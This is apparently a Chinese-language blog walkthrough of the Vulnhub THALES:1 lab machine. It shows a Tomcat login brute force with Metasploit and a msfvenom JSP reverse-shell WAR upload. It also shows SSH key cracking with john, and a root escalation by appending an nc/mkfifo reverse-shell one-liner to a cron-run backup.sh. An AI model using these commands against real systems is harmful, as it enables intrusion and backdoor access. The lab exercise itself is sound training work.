当前位置:网站首页>【Vulnhub靶场】THALES:1
【Vulnhub靶场】THALES:1
2022-07-07 14:12:00 【Nailaoyyds】
目录
前言
描述
简介:睁开眼,换个角度
包括 2 个标志:user.txt 和 root.txt。
下载链接
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00环境介绍 kali 192.168.56.102 Thales靶机 192.168.56.101
一、信息收集
0x00 arp-scan扫描
arp-scan -I eth1 -l #扫描网卡局域网
0x01 nmap扫描
扫描到两个网段 不确定是哪个 nmap 扫描扫描两个IP
开放端口22和8080
访问站点,发现需要用户名密码
二、漏洞利用
0x00 msfconsole利用
msf搜索tomcat login
配置payload
用户名 tomcat 密码 role1
成功登入
0x01 文件上传
寻找功能点,发现上传点
利用kali生成war文件木马做反弹shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
上传成功,并运行
三、权限提升
0x00 反弹shell
监听端口
升级成交互式shell
sudo -l #需要密码,未知 在home文件下发现用户Thales
在`notes.txt`文件中发现`/usr/local/bin/backup.sh 查看文件内容
0x02 字典爆破
发现.ssh文件夹
发现私钥可以用ssh2john.py生成密码文件爆破
用 ssh2john.py
脚本编译一下
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
爆破出密码vodka06
切换用户
0x03 user.txt
查看user.txt---第一个flag
notes.txt是root权限的,里边可能是有东西都
0x04 反弹shell
看到backup.sh是有执行权限的,可以写入反弹shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
文件内容编辑会直接替换,选择用追加
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
监听9999,写入以后过一会就自己连接了
总结
Thales学到了
msf的爆破字典的使用
rsa私钥密文的利用
边栏推荐
- asyncio 概念和用法
- hellogolang
- leetcode 241. Different Ways to Add Parentheses 为运算表达式设计优先级(中等)
- How to query the data of a certain day, a certain month, and a certain year in MySQL
- IP地址和物理地址有什么区别
- Vs tool word highlight with margin
- Use moviepy Editor clips videos and intercepts video clips in batches
- php 自带过滤和转义函数
- What about the pointer in neural network C language
- Continuous creation depends on it!
猜你喜欢
记一次项目的迁移过程
分步式監控平臺zabbix
模仿企业微信会议室选择
You Yuxi, coming!
融云斩获 2022 中国信创数字化办公门户卓越产品奖!
航運船公司人工智能AI產品成熟化標准化規模應用,全球港航人工智能/集裝箱人工智能領軍者CIMC中集飛瞳,打造國際航運智能化標杆
Mysql database basic operation DQL basic query
Unity3D_ Class fishing project, control the distance between collision walls to adapt to different models
神经网络c语言中的指针是怎么回事
2022第四届中国(济南)国际智慧养老产业展览会,山东老博会
随机推荐
The unity vector rotates at a point
121. The best time to buy and sell stocks
Unity3D_ Class fishing project, control the distance between collision walls to adapt to different models
Good news! Kelan sundb database and Hongshu technology privacy data protection management software complete compatibility adaptation
Plate - forme de surveillance par étapes zabbix
分步式監控平臺zabbix
Xcode Revoke certificate
TiDB For PostgreSQL和YugabyteDB在Sysbench上的性能对比
融云斩获 2022 中国信创数字化办公门户卓越产品奖!
Enterprise log analysis system elk
L'application à l'échelle de la normalisation mature des produits ai des compagnies maritimes, cimc, leader mondial de l'intelligence artificielle portuaire et maritime / intelligence artificielle des
招标公告:盘锦市人民医院盘锦医院数据库维保项目
Shader_ Animation sequence frame
讲师征集令 | Apache SeaTunnel(Incubating) Meetup 分享嘉宾火热招募中!
Shader basic UV operations, translation, rotation, scaling
thinkphp3.2.3中设置路由,优化url
You Yuxi, coming!
SPI master RX time out interrupt
The differences between exit, exit (0), exit (1), exit ('0 '), exit ('1'), die and return in PHP
Three singleton modes of unity (hungry man, lazy man, monobehavior)